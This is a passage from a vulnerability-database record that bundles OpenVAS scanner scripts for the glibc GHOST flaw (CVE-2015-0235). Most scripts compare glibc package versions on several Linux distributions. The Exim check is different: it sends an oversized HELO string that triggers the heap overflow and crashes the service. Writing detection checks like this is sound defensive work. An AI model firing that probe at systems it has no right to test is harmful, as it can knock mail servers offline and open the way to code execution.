Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0092-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-January/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.el7_0.5\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.149.el6_6.5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:34", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0092", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123197", "title": "Oracle Linux Local Check: ELSA-2015-0092", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0092.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123197\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:35 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0092\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0092 - glibc security update for Oracle Linux 7. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0092\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0092.html\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:50", "bulletinFamily": "scanner", "description": "Check the version of glibc", "modified": "2019-03-08T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310882109", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882109", "title": "CentOS Update for glibc CESA-2015:0092 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2015:0092 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882109\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:10:55 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for glibc CESA-2015:0092 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of glibc\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0092\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020907.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.149.el6_6.5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:32", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0090", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123196", "title": "Oracle Linux Local Check: ELSA-2015-0090", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0090.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123196\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:35 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0090\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0090 - glibc security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0090\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0090.html\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~123.0.1.el5_11.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:43", "bulletinFamily": "scanner", "description": "The remote exim is using a version of glibc which is prone to a heap-based buffer-overflow\nvulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-01-29T00:00:00", "id": "OPENVAS:1361412562310105188", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105188", "title": "GNU glibc Remote Heap Buffer Overflow Vulnerability (Exim)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_ghost_72325.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# GNU glibc Remote Heap Buffer Overflow Vulnerability (Exim)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105188\");\n script_bugtraq_id(72325);\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11872 $\");\n\n script_name(\"GNU glibc Remote Heap Buffer Overflow Vulnerability (Exim)\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/72325\");\n script_xref(name:\"URL\", value:\"http://www.gnu.org/software/libc/\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to execute arbitrary code in the\ncontext of the affected application. Failed exploit attempts may crash the application, denying service\n to legitimate users.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HELO request and check the response\");\n script_tag(name:\"solution\", value:\"Update you glibc and reboot.\");\n script_tag(name:\"summary\", value:\"The remote exim is using a version of glibc which is prone to a heap-based buffer-overflow\nvulnerability.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-29 15:17:02 +0100 (Thu, 29 Jan 2015)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"SMTP problems\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n exit(0);\n}\n\ninclude(\"smtp_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nrecv( socket:soc, length:512 );\n\nsend( socket:soc, data:'HELO FOOBAR\\r\\n' );\nrecv = recv( socket:soc, length:512 );\nclose( soc );\n\nif( \"550 HELO argument does not match calling host\" >!< recv ) exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nrecv = recv( socket:soc, length:512 );\n\nreq = 'HELO ' + crap( data:\"0\", length:1235 ) + '\\r\\n';\n\nfor( i = 1; i < 5; i++ )\n{\n send( socket:soc, data:req );\n recv = recv( socket:soc, length:512 );\n\n if( ! recv )\n {\n if( ( i == 2 || i == 4 ) && socket_get_error( soc ) == ECONNRESET ) # 2 times for 32bit, 4 times for 64bit\n {\n close( soc );\n security_message( port:port );\n exit( 0 );\n }\n }\n}\n\nif( soc ) close( soc );\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:05", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120286", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120286", "title": "Amazon Linux Local Check: ALAS-2015-473", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-473.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120286\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:42 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-473\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in glibc. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system. Note that you may need to run yum clean all first. Once this update has been applied, reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version. On new instance launches, you should still reboot after cloud-init has automatically applied this update.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-473.html\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~55.93.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310871308", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871308", "title": "RedHat Update for glibc RHSA-2015:0090-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2015:0090-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871308\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 